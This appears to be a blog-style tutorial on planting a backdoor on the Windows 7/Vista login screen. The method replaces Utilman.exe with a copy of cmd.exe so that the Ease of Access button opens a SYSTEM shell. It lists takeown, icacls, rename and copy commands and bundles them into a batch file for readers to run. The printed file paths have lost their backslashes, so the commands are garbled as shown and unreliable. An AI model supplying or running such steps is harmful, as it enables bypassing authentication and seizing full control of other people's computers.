If you have any experience with Windows 7 or Vista, you will know that the Administrators account is disabled by default. In XP, a simple backdoor was procured by hitting Ctrl-alt-delete twice at the login screen, to bring you to a proper login prompt, and logging into an unprotected Administrator account. Because this is not possible in Windows 7 or Vista, I looked for a different way to get in. When you come to the login screen for Windows 7, there are three doors that lead to different situations: The user account: typically brings you to a password prompt if it is clicked, and the account has been password protected. Nothing here... The shutdown button: Gives you the option to restart, shutdown, or put your computer to sleep. Another dead end... The Ease Of Access button: Gives you multiple options to improve the usability of Windows 7 or Vista. These options have to be stored somewhere in the WINDOWS folder...lets go take a peek. After a little research, I found that the executable that the Ease Of Access option executes is called "Utilman.exe" in the system32 folder of WINDOWS. Light bulb moment. What if we replaced that utility with a command prompt? So, I tried to replace it with a different executable. Unfortunately, I could not change its name, or delete it- it was locked. I tried using my favorite unlocking utility, Unlocker, but that program is not compatible with Windows 7. So I researched online for a better way to unlock it. I found a proper command line argument that allowed me to take ownership of the file, and voila! An unlocked Utilman.exe file. Here are the steps to making the backdoor: 1. Take full ownership of the Utilman.exe file. takeown /f "c:windowssystem32Utilman.exe 2. Modify the Access Control List that controls this file, and grant us full administrators access to the file. icacls "c:windowssystem32Utilman.exe" /grant administrators:F 3. Rename the Utilman.exe file, so that it is not called by Windows at any time. rename c:windowssystem32Utilman.exe Utilman2.exe 4. Copy the command line executable in the same folder, and rename it to something generic, so that it doesn't interfere with the original command line executable. I used cmd5.exe. copy c:windowssystem32cmd.exe c:windowssystem32cmd5.exe 5. Rename the copied command line executable to Utilman.exe, thus substituting the command prompt for the Ease of Access utility. rename c:windowssystem32cmd5.exe Utilman.exe And you're done! Make sure you run all of these commands as administrator by right-clicking the command prompt file and selecting "Run as Administrator". I took the liberty of writing a batch file that, when run as admin, performs all of these steps in a blink of an eye. To create your own, simply open a .txt file with notepad, copy these commands into the file: takeown /f "c:windowssystem32Utilman.exe icacls "c:windowssystem32Utilman.exe" /grant administrators:F rename c:windowssystem32Utilman.exe Utilman2.exe copy c:windowssystem32cmd.exe c:windowssystem32cmd5.exe rename c:windowssystem32cmd5.exe Utilman.exe Save as:
.bat Right click, "Run as Administrator". To test to see if it works, reboot your computer, and when it comes to the login screen, instead of logging in, click on the Ease of Access button. It should present you with a command shell with SYSTEM privileges.